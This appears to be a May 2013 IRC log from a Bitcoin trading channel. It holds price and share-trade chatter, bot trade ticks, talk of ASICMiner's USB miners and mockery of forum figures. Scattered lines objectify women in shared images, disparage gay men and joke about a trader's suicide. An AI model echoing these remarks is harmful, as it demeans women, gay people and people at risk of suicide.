04:07:42 on your blog eh May 04 04:07:55 The comment saying you'll be bankrupt in 6 months May 04 04:08:09 a May 04 04:08:22 well those have been a favourite for a while. May 04 04:09:16 the best stuff is like May 04 04:09:16 [17:56:26] shareholder1 mpex will be classified as money launderers and terrorists May 04 04:09:23 http://trilema.com/2012/the-stockexchange-shareholders-on-welfare/ May 04 04:09:39 "Excessive IRC usage" May 04 04:09:43 :P May 04 04:09:53 nu-uh, i love using irc. May 04 04:10:02 i use it until tears stream down it's cheeks. May 04 04:10:13 illustration time! May 04 04:10:13 http://polimedia.us/dtng/c/src/136131935773.jpg May 04 04:10:27 what irc client do you use May 04 04:10:45 o yeah i also use the client, not just irc May 04 04:10:48 she aight..boobs are just a bit too big or misshaped May 04 04:11:07 i use mirc which one do you use May 04 04:11:12 xcheat May 04 04:11:28 whats up w the market, why is it not crashing? lol May 04 04:11:33 i used to use bitchx for linux May 04 04:11:37 lots of bids May 04 04:11:37 why'd it be crashing ? May 04 04:11:53 because it's the crash mcmaster May 04 04:12:20 i see gradual dips to nothingness..then a big BOOOOOM...until it lowers to a stable long term price..thats what im thinking..this is a bouncing cat maybe? May 04 04:12:48 definately not tulip rigjht May 04 04:12:57 [BTCTC] [ASICMINER-PT] 1 @ 1.2991 BTC [-] May 04 04:13:03 the tuplip show is officially over May 04 04:13:09 i missed the bus on that, silly me May 04 04:13:44 as in http://timedatestamp.tumblr.com/post/18195881869/gotta-plant-two-lips-somewhere May 04 04:13:57 tulip scared me a bit May 04 04:14:31 those are a little big for my liking though..i'm down with the B cup..a nice full B. May 04 04:14:55 KRS, why you think nothingness? May 04 04:16:29 from what i learned markets can boom and tulip..or bouncing cat rising then coming up lower each time to a low low...then somehow reinvestment kindles another boom and then market price settles..this is from what i understand the evolution pattern an investment takes if it doesnt die May 04 04:16:46 i think there are other patterns but i also may be wrong, im still learning quite a bit May 04 04:18:37 [BTCTC] [S.DICE-PT] 125 @ 0.00327 = 0.4088 BTC [+] May 04 04:18:50 i suspect entirely too much energy is dedicated to watching the pot boil. May 04 04:18:57 mircea_popescu: do you have any more good pics May 04 04:19:02 most would be better spent building services and such May 04 04:19:07 [BTCTC] [BTC-BOND] 1 @ 0.01003 BTC [-] May 04 04:19:08 http://polimedia.us/dtng/c/ May 04 04:19:12 knock yourself out. May 04 04:19:16 [BTCTC] [BTC-BOND] 1000 @ 0.01002 = 10.02 BTC [-] May 04 04:19:25 [BTCTC] [BTC-BOND] 546 @ 0.010001 = 5.4605 BTC [-] May 04 04:19:28 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [-] May 04 04:19:29 you are right about the boiling pot thing..folks probably need to make the investment and forget about it..the day traders are the ones with all the effort May 04 04:19:31 thanks mircea May 04 04:19:32 [BTCTC] [BTC-BOND] 4 @ 0.01 = 0.04 BTC [-] May 04 04:19:42 [BTCTC] [BTC-BOND] 1250 @ 0.01 = 12.5 BTC [-] May 04 04:19:44 [BTCTC] [S.DICE-PT] 75 @ 0.00327 = 0.2453 BTC [+] May 04 04:19:49 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [-] May 04 04:19:50 haha AWESOME May 04 04:20:23 sup /b/ lol May 04 04:23:50 why are there a bunch of dudes in here I thought most of you folks are heterosexual..wtf May 04 04:24:13 my friends are right about europeans? they are very feminine May 04 04:24:15 well... most. May 04 04:24:41 You should account for people that just post this to annoy other people, apperently successfully. May 04 04:24:42 worst thing I ever saw was a gay cowboy..or maybe cop... May 04 04:24:59 theres no cowboys in europe right May 04 04:25:11 ok this is hilarious, us is changing calculation of gdp and debt ratio May 04 04:25:16 I'm not a cowboy or "redneck"..but some of my friends are. May 04 04:25:18 to show more gdp, less debt May 04 04:25:39 its just an illusion May 04 04:25:44 for more investment maybe May 04 04:26:34 dayyyyum..nice ass. May 04 04:26:38 sup lipppppoper May 04 04:43:55 Dividends on S.DICE-PT, S.MPOE-PT, S.BBET-PT all paid May 04 04:48:22 [MPEX] [S.MPOE] 8030 @ 0.00069303 = 5.565 BTC [-] May 04 04:48:23 [MPEX] [S.MPOE] 576 @ 0.00069303 = 0.3992 BTC [-] May 04 04:52:05 [BTCTC] [PAJKA.BOND] 4 @ 0.10889 = 0.4356 BTC [-] May 04 04:57:59 namworld - Yay! May 04 05:00:44 [BTCTC] [ASICMINER-PT] 10 @ 1.299 = 12.99 BTC [-] May 04 05:03:18 [BTCTC] [S.DICE-PT] 654 @ 0.003279 = 2.1445 BTC [+] May 04 05:05:24 mircea_popescu howdy May 04 05:06:23 sup **** BEGIN LOGGING AT Sat May 4 14:13:44 2013 May 04 14:24:03 so AM shares would prob be a good deal about now lol May 04 14:24:07 G'morning May 04 14:26:21 i'd short them if i could find any offers May 04 14:50:08 [BTCTC] [ASICMINER-PT] 1 @ 1.277 BTC [+] May 04 14:50:34 [BTCTC] [ASICMINER-PT] 19 @ 1.277 = 24.263 BTC [+] May 04 15:00:55 so, anything newsworthy' May 04 15:03:22 https://bitcointalk.org/index.php?action=profile;u=110685;sa=showPosts May 04 15:08:57 [BTCTC] [ASICMINER-PT] 3 @ 1.26 = 3.78 BTC [-] May 04 15:09:00 [BTCTC] [ASICMINER-PT] 1 @ 1.25251 BTC [-] May 04 15:09:04 [BTCTC] [ASICMINER-PT] 1 @ 1.2525 BTC [-] May 04 15:09:23 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] May 04 15:13:21 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] May 04 15:13:27 [BTCTC] [ASICMINER-PT] 1 @ 1.24 BTC [-] May 04 15:17:46 http://trilema.com/2013/some-basic-discussion-of-bitcoin-macroeconomy/ May 04 15:20:52 AM over 15 th and adding more today... May 04 15:21:17 hey MP that finland guy sent the wire May 04 15:21:45 https://bitcointalk.org/index.php?topic=194803.0 also things look good in china May 04 15:22:21 Chaang-Noi a hey, pretty cool then May 04 15:22:42 yeah i was kinda shocked May 04 15:23:00 sadly btc seems to be pulled up by china.. i wanted to double my coins... May 04 15:23:13 yeah, china is pretty strong May 04 15:23:17 was looking for low 70s and maybe 60s May 04 15:23:36 in that thread i just linked shows how they are going crazy, media just hit them, May 04 15:26:16 [BTCTC] [S.DICE-PT] 16 @ 0.0033 = 0.0528 BTC [+] May 04 15:26:28 [BTCTC] [ASICMINER-PT] 1 @ 1.26 BTC [+] May 04 15:26:31 [BTCTC] [ASICMINER-PT] 7 @ 1.25 = 8.75 BTC [-] May 04 15:32:43 is this rpietila guy for real? just catching up after a week with limited internet. I mean seriously, he seems pretty far out there. May 04 15:33:15 and that's saying something given the company we keep. May 04 15:33:40 he did send me 2.65 million baht May 04 15:33:58 he has silver poisoning May 04 15:33:58 well, that sounds pretty legit. May 04 15:34:01 but yeah, i think he is insane/super bull/high/crazy May 04 15:34:07 does he really lol May 04 15:34:13 he doean't look blue to me. May 04 15:34:23 he had it all over him, in a photo posted May 04 15:34:28 makeup. May 04 15:34:30 kako still have that link? May 04 15:34:36 hmm May 04 15:34:46 he put silver on his head May 04 15:34:50 for tv... May 04 15:34:52 [BTCTC] [S.DICE-PT] 51 @ 0.00329 = 0.1678 BTC [-] May 04 15:35:15 oh, well if it's for tv... May 04 15:35:23 well hm May 04 15:35:25 this is new May 04 15:35:25 https://bitcointalk.org/index.php?topic=178336.msg2024829#msg2024829 May 04 15:35:28 lmao May 04 15:35:45 oh lawd... May 04 15:35:54 https://bitcointalk.org/index.php?topic=178336.msg2016328#msg2016328 May 04 15:36:16 even better lol May 04 15:36:18 ColdHardMetal he's our fav tyroll atm May 04 15:36:40 at the same time it's so far out there I think I kind of like it. May 04 15:36:44 yup May 04 15:36:48 s/troll/token bull/ May 04 15:37:16 "As matter of fact, I applaud his efforts as an experienced, professional bitcoin broker/dealer to create infrastructure" May 04 15:37:26 here's the thing : he's an idiot making all the idiots on the forum really stand out May 04 15:37:30 it's wunderbar May 04 15:37:54 [BTCTC] [ASICMINER-PT] 1 @ 1.25001 BTC [+] May 04 15:38:00 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] May 04 15:38:02 you referencing him, or him referencing you (sw) May 04 15:38:21 no, some guy in the forum talking about the uppity tortilla guy May 04 15:38:21 battle of the supernodes May 04 15:38:42 it's like... noob joined last month is "experienced" in writer's estimation. May 04 15:38:44 coolness. May 04 15:40:24 like camwhore with that piece of paper in his hand May 04 15:40:26 srsly May 04 15:40:38 inb4 sharpie May 04 15:40:45 "verify my vagoo" May 04 15:40:46 indeed. what's with the whole supernode thing? is that his term? I've never heard it before, but then someone else said something that made me wonder if it actually meant something. May 04 15:40:47 totally ahaha May 04 15:40:50 he clearly does not fit in and is trying way way too hard, but he is trying to support btc May 04 15:40:56 he is not hurting anything May 04 15:41:20 ColdHardMetal some nonsense guy came up with May 04 15:41:23 true enough chaang. at least he's doing something I guess. May 04 15:41:34 totally. bitcoin is backed by drama and lulz. May 04 15:41:40 he's adding lulz, at his own expense. May 04 15:41:47 MP: ok. that makes more sense really. May 04 15:41:58 yes, free lulz, i have not oinly got a bunch of fiat, but so much poped corn May 04 15:42:21 worse still, peoples opinions are influenced by money, not how ridiculous something sounds May 04 15:42:23 ColdHardMetal he made a thread full of weird posturing and nonsense of the sort, girl eventualyl stomped him, he deleted it May 04 15:42:33 there was a screenshot floating about but i don't recall where May 04 15:42:36 so if cooperating with supernode is profitable, hurray for bitcoin supernodes May 04 15:42:42 MP: missed all that. shame really. May 04 15:42:56 and my conversion table. May 04 15:43:01 http://ctrlq.org/files/screenshots/6a630eefd44705f3ead4d3e81658fa9b.png May 04 15:43:01 here May 04 15:43:15 sweet. May 04 15:43:42 and yeah, kako's conversion table. May 04 15:44:32 kakos conversion table is pretty close to his new supernode conversion table May 04 15:44:35 did you guys see that? May 04 15:44:40 urlpls May 04 15:44:43 nope. May 04 15:45:16 wha ?! May 04 15:45:27 https://bitcointalk.org/index.php?topic=178336.msg2024443#msg2024443 May 04 15:46:04 waaaait why isnt this in mbtc/drops of bitcoin but in whole btc May 04 15:46:54 honestly this guy reminds me a a puppy who is so happy it goes nuts and pisses on the floor in exsitment, he is just holy shit btc and crazy wow, honestly if 10,000 people with his wealth did this, btc would move way up.... May 04 15:48:25 "In February, nobody knew me. Now, everybody knows me." May 04 15:48:30 awesome, made the list. p'raps I should add it to my biz card. May 04 15:48:40 no doubt May 04 15:54:09 104... booo i want 70!!!!!! May 04 15:56:11 yeah, what happened to the whole chicken little scenario? May 04 15:56:22 china May 04 15:56:55 I did see that. interesting for sure. hopefully they don't all go CNC or whatever it's called. May 04 15:57:19 yeah lol May 04 15:57:24 fucking china coin May 04 15:58:05 [BTCTC] [B.YABMC] 17 @ 0.0155 = 0.2635 BTC [-] May 04 15:58:12 https://bitcointalk.org/index.php?topic=194803.msg2024884#msg2024884 May 04 15:58:31 [BTCTC] [B.YABMC] 14 @ 0.0159 = 0.2226 BTC [+] May 04 15:59:03 [BTCTC] [B.YABMC] 75 @ 0.016 = 1.2 BTC [+] May 04 15:59:24 [BTCTC] [B.YABMC] 83 @ 0.0161 = 1.3363 BTC [+] May 04 15:59:59 [BTCTC] [B.YABMC] 311 @ 0.01619 = 5.0351 BTC [+] May 04 16:02:21 http://jingji.cntv.cn/2013/05/03/VIDE1367596319388137.shtml i dont have the right plug ins is this the chinese video? May 04 16:02:25 want to send to some chinese May 04 16:02:58 "...was the third one the mother of the two?" May 04 16:03:00 gold MP, gold. May 04 16:04:57 105.5 May 04 16:05:00 boooo May 04 16:05:47 I already bought mine around 70 EUR, so let them go up Chaang-Noi May 04 16:06:31 hmm i sold at 135 and want back in May 04 16:06:57 hard man to please May 04 16:07:27 my most crazy sale was 0.3 BTC at 500 EUR on the rock May 04 16:07:33 just before the crash May 04 16:07:59 crazy in terms of EUR/BTC conversion, not quantity of course :) May 04 16:08:33 insane May 04 16:08:45 yeah then some at 250 EUR May 04 16:08:58 man that guy must've been pissed when it crashed a couple of hours later May 04 16:09:02 probably killed himself May 04 16:12:15 yeah, what happened to the whole chicken little scenario? << it changes. May 04 16:14:12 [BTCTC] [ASICMINER-PT] 1 @ 1.27497 BTC [+] May 04 16:14:23 [BTCTC] [ASICMINER-PT] 18 @ 1.27498 = 22.9496 BTC [+] May 04 16:15:58 woah it's even more than I thought now I look back at the logs, about 12 BTC at avg 215 EUR each just before it crashed May 04 16:16:34 good times.. May 04 16:19:33 go build something worth a million bitcoin. May 04 16:19:43 this bought 5 for 3 sold 4 for 20 is pretty much dust. May 04 16:20:00 working on it MP May 04 16:20:31 that's the spirit,. May 04 16:23:20 already co-founded a company worth something close to that, don't worry :) May 04 16:23:28 nothing btc related though May 04 16:24:34 well then it's not related now is it. May 04 16:26:21 okay I'm not gonna go further into it, don't need to prove myself May 04 16:27:09 agreed to keep topic to btc and exchanges May 04 16:27:16 so my apologies May 04 16:29:39 ;;bc,stats May 04 16:29:42 Current Blocks: 234488 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 1383 blocks | Next Difficulty In About: 1 week, 2 days, 6 hours, 45 minutes, and 54 seconds | Next Difficulty Estimate: 10164038.3689 | Estimated Percent Change: 0.87081 May 04 16:35:28 You're gonna wait for that with trades like one you did with goat. So happy for the guy, he is real supernode you dream to be and yet nice, on the ground guy, and he just banked another 200-300 coins. Lovely Grin May 04 16:35:32 haha im a real super node May 04 16:37:03 which class May 04 16:37:26 he did not say May 04 16:37:53 but whatever the 1000 one is if 700 plus 300 May 04 16:38:55 2.0nd class supernode = BTC1,000 May 04 16:39:01 w00t May 04 16:39:18 [BTCTC] [ASICMINER-PT] 1 @ 1.25 BTC [-] May 04 16:39:22 [BTCTC] [ASICMINER-PT] 1 @ 1.2461 BTC [-] May 04 16:39:26 [BTCTC] [ASICMINER-PT] 1 @ 1.24601 BTC [-] May 04 16:39:52 [BTCTC] [ASICMINER-PT] 1 @ 1.245 BTC [-] May 04 16:40:18 who the fuck is selling? they just doubled their speed May 04 16:41:38 wait till they start selling their usb sticks May 04 16:47:21 [BTCTC] [ASICMINER-PT] 1 @ 1.27397 BTC [+] May 04 16:51:44 http://postimg.org/image/5f8g9s8jd/ hahahhahahahahhahahahahaha May 04 16:52:11 hehe May 04 16:54:02 lmao Chaang-Noi May 04 16:54:09 you did it? May 04 16:54:10 https://bitcointalk.org/index.php?topic=195004.msg May 04 16:54:15 i did not do it May 04 16:54:19 but i loled May 04 16:55:42 2 btc lol May 04 16:55:47 it will never mine them back May 04 16:56:03 what do i care? im a stock holder :) May 04 16:56:13 [BTCTC] [ASICMINER-PT] 1 @ 1.24031 BTC [-] May 04 16:56:28 [BTCTC] [ASICMINER-PT] 1 @ 1.2402 BTC [-] May 04 16:56:32 [BTCTC] [ASICMINER-PT] 1 @ 1.2321 BTC [-] May 04 16:57:37 i dont understand why anyone would sell now. about to sell these in bulk, and they doubled their speed? wtf? May 04 16:57:47 lol someone forgot to deselect right fog light May 04 16:57:51 its pink May 04 16:58:16 he rented it for supernode fest May 04 16:58:39 id add a hat and a cane May 04 16:59:14 and a monoical no doubt May 04 17:00:32 crumbcake seemed to make it May 04 17:01:23 yeah May 04 17:01:34 might be ahrd to do with glasses May 04 17:02:07 btc lulz is just so much better than tv or just about anything May 04 17:02:29 decent wall on 103, crazy May 04 17:02:38 i thought we would be in the 80s or 70s May 04 17:03:39 lol May 04 17:03:52 hope you did not short May 04 17:05:17 zero btc? May 04 17:05:23 why are you even here? the lulz? May 04 17:05:59 kako i think you are right, 2 btc is too much for these units, good chance they will not recover 2 btc with the rate the difficulty is going up May 04 17:06:10 however i bet we sell 1000's of them May 04 17:06:47 maybe breakeven in 8 to 12 months May 04 17:07:57 108 May 04 17:08:37 if this was not a weekend... May 04 17:12:36 holy batman and robin May 04 17:13:08 eating through that 500 btc wall at 110 like nothing May 04 17:17:51 [BTCTC] [ASICMINER-PT] 1 @ 1.278 BTC [+] May 04 17:20:44 https://docs.google.com/spreadsheet/ccc?key=0AkPdXsQFT-vIdHRVUjQ5Ql9BQWR6OENLMkhyUktUblE#gid=7 May 04 17:23:35 113 May 04 17:23:56 truffles its AM chart showing well over 15 th May 04 17:25:03 asic miner terahash May 04 17:30:55 wow 115 May 04 17:31:01 and to think i almost shorted btc :/ May 04 17:32:57 [BTCTC] [PAJKA.BOND] 9 @ 0.10889 = 0.98 BTC [+] May 04 17:34:28 [BTCTC] [PAJKA.BOND] 1 @ 0.1089 BTC [+] May 04 17:50:08 [BTCTC] [ASICMINER-PT] 1 @ 1.26 BTC [-] May 04 18:16:45 [BTCTC] [ASICMINER-PT] 1 @ 1.277 BTC [+] May 04 18:18:09 [BTCTC] [ASICMINER-PT] 5 @ 1.261 = 6.305 BTC [-] May 04 18:18:26 [BTCTC] [ASICMINER-PT] 2 @ 1.26 = 2.52 BTC [-] May 04 18:18:31 [BTCTC] [ASICMINER-PT] 10 @ 1.25 = 12.5 BTC [-] May 04 18:27:04 [HAVELOCK] [HIM] 1 @ 1.95 BTC [+] May 04 18:28:15 [BTCTC] [ASICMINER-PT] 1 @ 1.27799 BTC [+] May 04 18:29:06 [BTCTC] [ASICMINER-PT] 1 @ 1.278 BTC [+] May 04 18:40:25 ;;ticker May 04 18:40:33 BTCUSD ticker | Best bid: 108.42000, Best ask: 109.00000, Bid-ask spread: 0.58000, Last trade: 109.00000, 24 hour volume: 128965.84192852, 24 hour low: 90.02000, 24 hour high: 115.24000, 24 hour vwap: 100.53570 May 04 18:46:22 1719.38 a few seconds ago 111.30 May 04 18:46:23 fuck me May 04 18:48:34 oh that feels so good! May 04 18:48:44 [BTCTC] [ASICMINER-PT] 1 @ 1.24101 BTC [-] May 04 18:48:44 harder harder you pineapple! May 04 18:48:56 [BTCTC] [ASICMINER-PT] 5 @ 1.241 = 6.205 BTC [-] May 04 18:49:01 [BTCTC] [ASICMINER-PT] 1 @ 1.24023 BTC [-] May 04 18:49:10 [BTCTC] [ASICMINER-PT] 1 @ 1.23511 BTC [-] May 04 18:49:15 [BTCTC] [ASICMINER-PT] 1 @ 1.23027 BTC [-] May 04 18:49:20 [BTCTC] [ASICMINER-PT] 1 @ 1.2231 BTC [-] May 04 18:49:25 [BTCTC] [ASICMINER-PT] 1 @ 1.2221 BTC [-] May 04 18:49:42 i dont see wh anyone would want to seel AM now :/ May 04 18:52:00 creeping up on 20TH May 04 18:52:06 no shit? May 04 18:52:11 17 th last i saw May 04 18:52:17 its like 17.5 i think May 04 18:52:26 but i assume they are still going May 04 18:52:35 i have no idea May 04 18:52:46 i hope every week is like this May 04 18:52:49 he still plans on getting to 262 or somthing May 04 18:52:54 every week, 8 more TH May 04 18:52:54 so every week might be like this May 04 18:55:04 [HAVELOCK] [VTX] 5 @ 0.478 = 2.39 BTC [+] May 04 18:56:03 lol May 04 18:56:04 [HAVELOCK] [KCIM] 4 @ 1.465 = 5.86 BTC [-] May 04 18:56:27 MP AM has about 25% of the network :) May 04 18:57:04 [HAVELOCK] [SDICE] 4 @ 0.31999 = 1.28 BTC [+] May 04 18:57:46 cool May 04 18:58:04 [HAVELOCK] [HIM] 4 @ 1.999 = 7.996 BTC [+] May 04 18:58:14 and tehy are selling their usb 300 mhs things for 2 btc each, min order of 300 May 04 18:58:26 should be some massive btc inflowing May 04 18:58:29 oh he announced the price? May 04 18:58:33 https://bitcointalk.org/index.php?topic=180614.0;topicseen May 04 18:58:34 got link? May 04 18:58:37 hey hey May 04 18:58:48 :) May 04 18:58:57 everything is gone May 04 18:59:04 [HAVELOCK] [KCIM] 3 @ 1.466 = 4.398 BTC [+] May 04 18:59:05 ? May 04 18:59:10 what? May 04 18:59:18 click link May 04 18:59:26 its just a grumpy face May 04 18:59:31 wrong link sorry May 04 18:59:32 one sec May 04 18:59:42 https://bitcointalk.org/index.php?topic=195004.0;topicseen May 04 18:59:44 correct link May 04 18:59:44 hehe May 04 19:00:04 113 again May 04 19:00:10 and that wall at 11.3 was destroyed May 04 19:00:26 Anyone here getting asic chips? May 04 19:00:28 from avalon? May 04 19:00:51 ;;ticker May 04 19:00:52 BTCUSD ticker | Best bid: 112.50000, Best ask: 112.86000, Bid-ask spread: 0.36000, Last trade: 112.50000, 24 hour volume: 131854.33150508, 24 hour low: 90.02000, 24 hour high: 115.24000, 24 hour vwap: 101.00301 May 04 19:01:03 avalon will take ages May 04 19:01:08 im not May 04 19:01:12 thestringpuller some people have, yeah. May 04 19:01:37 mp some people "here" have? May 04 19:01:39 Well there are some on ebay May 04 19:01:50 for 200 bucks May 04 19:01:50 the units or the chips? May 04 19:02:05 Chaang-Noi both units and chips, yes. May 04 19:02:10 buying just a chip is silly May 04 19:02:42 no May 04 19:02:48 you can put chip into breadboard May 04 19:02:49 fuck with it May 04 19:02:55 pay someone for pcb May 04 19:02:59 DIY May 04 19:03:05 Avalon has done the hard part May 04 19:03:11 okay May 04 19:03:14 meh May 04 19:03:19 ;;ticker May 04 19:03:20 BTCUSD ticker | Best bid: 111.45000, Best ask: 112.76000, Bid-ask spread: 1.31000, Last trade: 112.89999, 24 hour volume: 132408.63667921, 24 hour low: 90.02000, 24 hour high: 115.24000, 24 hour vwap: 101.15509 May 04 19:03:26 weee May 04 19:03:35 id be just as sucessful if you sent me a rock... May 04 19:03:47 so AM has 10000 usb miner PCBs in production May 04 19:03:51 Chaang-Noi a guy bought like k's of chips making his own pcbs May 04 19:04:04 20,000btc if they sell all May 04 19:04:17 and what was their costs? like 2000btc was it? May 04 19:04:28 they are selling for 2 btc? May 04 19:04:30 fuck dat May 04 19:04:39 that's like 1000% markup May 04 19:04:39 The 42,500mBTC profit would have enabled our lifestyle for several days... https://bitcointalk.org/index.php?topic=178336.msg2026536#msg2026536 May 04 19:04:52 finish guy is spending imiganary gains May 04 19:05:02 he's a riot. May 04 19:05:13 as a AM stock holder im very pleased with 1000% May 04 19:05:27 apple cant even do this shit:) May 04 19:05:50 apple does this shit regularly, are you kidding ? May 04 19:06:12 i highyl doubt they make 1000% on an ipad May 04 19:06:16 the only difference is that apple does it with 1bn units rather than 1k. May 04 19:06:19 so you doubt. May 04 19:06:20 yes, they do well, but not 1000% May 04 19:06:33 maybe on some weiard ass head phones or something but not a laptop... May 04 19:06:37 reptilia says: May 04 19:06:38 How about the following: May 04 19:06:39 - You escrow 100 bitcoins for my 1 May 04 19:06:39 - You write a 2013 $100,000 call option to your bitcoins, so that I can buy them from you anytime, by just sending you $10 million U.S. Dollars May 04 19:06:39 - If I do not redeem your bitcoins before 31. December 2013, you get my 1 bitcoin as I lose the bet May 04 19:07:26 The highest burn rate of $200k per month was last week, now I spend at about $50k per month May 04 19:07:27 lol May 04 19:07:31 lol wht May 04 19:08:21 its in the link May 04 19:08:26 hey mircea_popescu have you ever seen the movie brewster's millions? May 04 19:08:30 nope May 04 19:08:54 A minor league baseball player has to waste $30m in 30 days in order to inherit $300m; however he's not allowed to tell anyone about the $300m deal. May 04 19:09:48 i want the drugs he is on May 04 19:10:20 ;;genrate 300 May 04 19:10:22 The expected generation output, at 300.0 Mhps, given difficulty of 10076292.8834, is 0.0149729624451 BTC per day and 0.000623873435212 BTC per hour. May 04 19:10:37 lol May 04 19:10:43 yeah May 04 19:10:49 so it makes 1.5 btc in 100 days at current diff. May 04 19:10:51 le lol. May 04 19:11:03 yeah it will take about a year realistily to break even May 04 19:11:21 however i bet we sell 5,000 or more of these units May 04 19:11:22 also depends on if you wanna start using USD to calc value May 04 19:11:31 like if BTC goes to $300 May 04 19:11:33 etc May 04 19:11:39 people are still buying gpus to mine btc May 04 19:12:01 $150 for a 300 mh gpu or $200 for asic May 04 19:12:07 no brainer May 04 19:13:42 indeed no brainer May 04 19:13:48 the gpu has utility and retail value May 04 19:13:56 you can't play games on an asic May 04 19:14:19 the gpu can also be rma'd if it ends up bricked May 04 19:14:29 same as the usb May 04 19:14:37 for rmad May 04 19:14:53 i had 40 video cards at one point, i never played a single game May 04 19:15:22 the usb thing is not for everyone, but i bet 1000's sell May 04 19:15:23 ;;genrate 1200 May 04 19:15:24 The expected generation output, at 1200.0 Mhps, given difficulty of 10076292.8834, is 0.0598918497804 BTC per day and 0.00249549374085 BTC per hour. May 04 19:15:46 hah i used to make 2-3 daily btc on 1.2ghash May 04 19:15:49 times have changed May 04 19:15:53 lol 300 mhs at 200 btc? May 04 19:15:55 that's bs May 04 19:15:57 err May 04 19:15:59 2 btc* May 04 19:16:07 ;;calc 300 / 200 May 04 19:16:08 1.5 May 04 19:16:08 https://bitcointalk.org/index.php?topic=195057.0;topicseen people registered on the forum just to buy May 04 19:16:16 that's 1.5 dollars per megahash May 04 19:16:19 too expensive :P May 04 19:16:33 then dont buy :) May 04 19:16:37 [BTCTC] [ASICMINER-PT] 1 @ 1.23001 BTC [+] May 04 19:17:09 [BTCTC] [BTC-BOND] 1 @ 0.01 BTC [-] May 04 19:17:44 Chaang-Noi im sure 1000's will sell yeah. May 04 19:18:08 :) May 04 19:18:14 seems even more risky as a retailer though May 04 19:18:21 how much markup can you get away with May 04 19:18:21 yes it does May 04 19:18:25 and shipping them? May 04 19:18:25 on ebay? May 04 19:18:27 [BTCTC] [BTC-BOND] 11 @ 0.00999 = 0.1099 BTC [-] May 04 19:18:27 ouch May 04 19:18:29 yeah May 04 19:18:35 then ebay fees May 04 19:18:49 if i was in the usa id buy 300 of them, give them to my mom to list on ebay, and deal with it May 04 19:18:58 i bet they sell for $500 to $1000 each on ebay May 04 19:19:14 people who dont ahve btc cant but these... but people can use credit cards on ebay May 04 19:19:38 i guess retailer can sell in batches too May 04 19:19:56 maybe make a package deal that includes a powered hub May 04 19:19:57 yes May 04 19:20:11 yeah, just don't end up trapped in stock May 04 19:20:23 yeah, im not going to do it, but some one could May 04 19:20:27 ie, you buy 500, manage to sell 50 at 200% markup and sell 150 remaindered at 50% loss May 04 19:20:28 and im sure will May 04 19:20:58 shit, bette roff buying 600btc of AM stock probly May 04 19:22:21 http://instagram.com/itslavishbitch# lol, reminds me of finish guy May 04 19:22:41 yeah, just buy the stock May 04 19:23:15 actually it's funny, but it seems to me stock is oversold in about the same proportion as the retail product is overpriced. May 04 19:23:20 "My life is like Louis Vuitton, everyone wants it. -- You made ur bed so sleep in it peasants" May 04 19:23:29 as i said before, somebody with a business clue involved in asicminer. May 04 19:23:44 friedcat knows what he is doing May 04 19:23:51 half thereof, at least. May 04 19:24:13 he got all this money from us to make this awesome company, he is going to be one rich mother fucker May 04 19:24:25 and at no risk, other than time May 04 19:24:28 we paid for it May 04 19:24:52 almost as rich as me. May 04 19:25:00 [MPEX] [S.MPOE] 154 @ 0.00069303 = 0.1067 BTC [-] May 04 19:25:01 [MPEX] [S.MPOE] 1972 @ 0.00068919 = 1.3591 BTC [-] May 04 19:25:03 [MPEX] [S.MPOE] 450 @ 0.00068918 = 0.3101 BTC [-] May 04 19:25:06 i think maybe richer than erik ? May 04 19:25:31 if he keeps mining as many coins as he is mining and selling usbs at this rate :) May 04 19:25:37 ;;calc .85 * 300000 / 1.3 * 200000 May 04 19:25:38 39230769230.8 May 04 19:25:46 gah May 04 19:25:51 ;;calc .85 * 300000 / (1.3 * 200000 ) May 04 19:25:51 0.980769230769 May 04 19:26:01 ha. ever so slighter richer than erik atm. May 04 19:27:31 *hanbot* ahh hallo May 04 19:28:01 lets see what AM is worth in a year and what SDice is worth in a year.. also add up the dividends... May 04 19:30:57 http://www.bizjournals.com/sanjose/news/2013/05/03/elon-musk-admits-teslas-math-was-wrong.html May 04 19:33:07 bwahahaha May 04 19:33:20 Chaang-Noi sop far dice paid ~70k btc worth of dividends May 04 19:33:32 long way to go for am to get there, but yeah, next year is another year. May 04 19:34:03 number of dividends alone means nothing, May 04 19:34:18 AM has already paid out like 300% of the ipo May 04 19:34:31 and is trading what 1000% more as well? May 04 19:34:43 sdice is under ip and did not even pay out 100% yet? May 04 19:34:45 300% of ipo = ~12k btc ? or ~6k btc ? May 04 19:34:45 hmm May 04 19:35:07 ipo price was .1 btc, divs have been like .2 to .3 May 04 19:35:19 yes but you calcing over 200k shares or 400k shares ? May 04 19:35:22 and now trades at 1.2 May 04 19:35:29 because in fact it paid .1 to half the shares, not to the whole story. May 04 19:35:37 stop mixing things, we're discussing revenues here. May 04 19:36:08 you are trying to compair rev of 1 year of a company vs a mining company that is just now getting going May 04 19:36:15 just wait a year man, AM< is going to kill May 04 19:36:25 listen, they were both started about the same time, april 2012. May 04 19:36:39 i'm in no hurry, we see the year. May 04 19:37:36 AM was august, but its a whole differnt type of company as well May 04 19:37:48 but yeah, time will tell and you know where my money is:) May 04 19:45:32 http://instagram.com/itslavishbitch# this is insane, what a nutter May 04 19:48:50 oh I love that guy May 04 19:50:26 since tortilla and the dabs guy old usagi-eb artdrama seems so stale. May 04 19:51:09 yes May 04 19:51:22 at this rate we will ahve to charge people to watch this stuff May 04 19:52:12 totally. May 04 19:52:13 https://bitcointalk.org/index.php?topic=146611.0;all May 04 19:52:18 ziggap/aethero gone for good. May 04 19:52:25 im glad i never listed them in retrospect. May 04 19:52:45 its bad to list scammers May 04 19:52:58 ya well at the time he was not a scammer. May 04 19:53:05 his gf/wife had that bakery thing May 04 19:53:17 cant you see the future? May 04 19:53:52 yeah, I ordered some of his candied bacon May 04 19:53:54 it was tasty May 04 19:53:56 or her, I dunno May 04 19:54:06 poor stormy. May 04 19:54:06 whoever made it was good at it :P May 04 19:54:11 lol May 04 19:54:19 you know, i never pitied women as much in my life as since getting involved in bitcoin May 04 19:54:29 poor aethero, honestly. I feel bad for someone that paranoid, although I wouldn't wish dealing with them on anyone May 04 19:54:30 poor kludge's non-quite-but-cvasi-wife May 04 19:54:30 etc May 04 19:55:31 copumpkin true. and the thing with western medicine is the pill mania May 04 19:55:38 im not sure they in any way help. May 04 19:55:48 yeah, and I doubt he'd take them even if they did May 04 